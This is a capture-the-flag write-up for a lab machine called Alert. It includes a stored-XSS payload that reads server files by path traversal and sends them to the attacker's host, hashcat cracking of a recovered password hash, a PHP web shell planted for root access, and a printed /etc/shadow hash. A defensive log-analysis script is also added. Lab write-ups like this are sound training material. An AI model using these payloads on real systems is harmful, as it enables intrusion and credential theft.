Explore the fundamentals of cybersecurity in the Alert Capture The Flag (CTF) challenge, an easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.
Add Hosts
```
10.10.11.44 alert.htb statistics.alert.htb
```
Script to add hosts automatically
```bash
ip="10.10.11.44"
domain="alert.htb statistics.alert.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
```
Mapping
```
Nmap scan report for alert.htb (10.10.11.44)
Host is up (0.055s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
| 256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
|_ 256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Alert - Markdown Viewer
|_Requested resource was index.php?page=alert
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Subdomain
```bash
ffuf -w /usr/share/dict/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -u http://alert.htb -H 'Host: FUZZ.alert.htb' -fw 20
```

```
statistics [Status: 401, Size: 467, Words: 42, Lines: 15, Duration: 54ms]
```
WebServer:
Markdown XSS:

```html
<script>
fetch("http://alert.htb/messages.php?file=../../../../../etc/apache2/sites-enabled/000-default.conf")
  .then(response => response.text())
  .then(data => {
    fetch("http://<vpnip>:8000/?data=" + encodeURIComponent(data));
  })
  .catch(error => console.error("Error fetching the messages:", error));
</script>
```
URL-decode the response.
The decoded Apache configuration shows /var/www/statistics.alert.htb/.htpasswd, so request that file the same way:
```html
<script>
fetch("http://alert.htb/messages.php?file=../../../../../var/www/statistics.alert.htb/.htpasswd")
  .then(response => response.text())
  .then(data => {
    fetch("http://<vpnip>:8000/?data=" + encodeURIComponent(data));
  })
  .catch(error => console.error("Error fetching the messages:", error));
</script>
```
URL-decode the response.
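A defender-side check for the two `messages.php?file=` requests above, as an added example that is not part of the original writeup: it resolves the `file` parameter from access-log lines and reports any request that lands outside the intended directory. The base directory, log lines, client IP and function names are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the directory messages.php is meant to serve from (hypothetical path).
BASE_DIR = "/var/www/alert.htb/messages"

# Constructed access-log lines (Apache combined format); IPs and sizes are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2025:10:00:01 +0000] "GET /messages.php?file=note.txt HTTP/1.1" 200 120
192.0.2.10 - - [01/Jan/2025:10:00:02 +0000] "GET /messages.php?file=archive/../note.txt HTTP/1.1" 200 120
192.0.2.10 - - [01/Jan/2025:10:00:03 +0000] "GET /messages.php?file=../../../../../etc/apache2/sites-enabled/000-default.conf HTTP/1.1" 200 1432
192.0.2.10 - - [01/Jan/2025:10:00:09 +0000] "GET /messages.php?file=..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Fstatistics.alert.htb%2F.htpasswd HTTP/1.1" 200 57
192.0.2.10 - - [01/Jan/2025:10:00:12 +0000] "GET /index.php?page=alert HTTP/1.1" 200 966
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def resolve(file_param, base=BASE_DIR):
    """Lexically resolve base/file_param, as a naive file read would."""
    return posixpath.normpath(posixpath.join(base, file_param))

def escapes_base(file_param, base=BASE_DIR):
    """True when the parameter resolves to anything outside base."""
    resolved = resolve(file_param, base)
    return resolved != base and not resolved.startswith(base + "/")

def find_traversal(log_text, script="/messages.php", param="file"):
    """Return (client_ip, status, resolved_path) for each escaping request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path != script:
            continue
        # parse_qs percent-decodes values, so %2F-encoded separators are covered.
        for value in parse_qs(url.query).get(param, []):
            if escapes_base(value):
                hits.append((m["ip"], int(m["status"]), resolve(value)))
    return hits

if __name__ == "__main__":
    for ip, status, path in find_traversal(SAMPLE_LOG):
        print(f"{ip} status={status} read outside base: {path}")
```

The check is resolution-based rather than a substring match on `../`, so `archive/../note.txt` is not reported while an absolute path is. `normpath` is purely lexical; a server-side fix would apply the same containment test to the canonical path after symlinks are resolved.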
Brute Force the Hash
```bash
echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat -m 1600 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat /tmp/hash.txt --show
rm -rf /tmp/hash.txt
```
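This yields manchesterunited. Log in over SSH as albert, forwarding local port 8080 to port 8080 on the box's loopback interface: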
```bash
ssh -L 8080:127.0.0.1:8080 albert@alert.htb
```
```bash
cat user.txt
cd /opt/website-monitor/config
# Double quotes inside the PHP so the shell's single quotes are not closed early
echo '<?php system($_GET["cmd"]);?>' > webshell.php
```
On your machine:
```bash
curl -s 'http://127.0.0.1:8080/config/webshell.php?cmd=cat%20/root/root.txt'
```

```bash
curl -s 'http://127.0.0.1:8080/config/webshell.php?cmd=cat%20/etc/shadow'
```
$6$gSjyQo8nJFMsegNG$jRRGms4KAq1FGTXwBJl236Ui5OKRtmaM3k8nkXuvduPXnhhaT/ZCYHHYO3GxhUAik1NaFYlBGaQZBrzQHgOhc/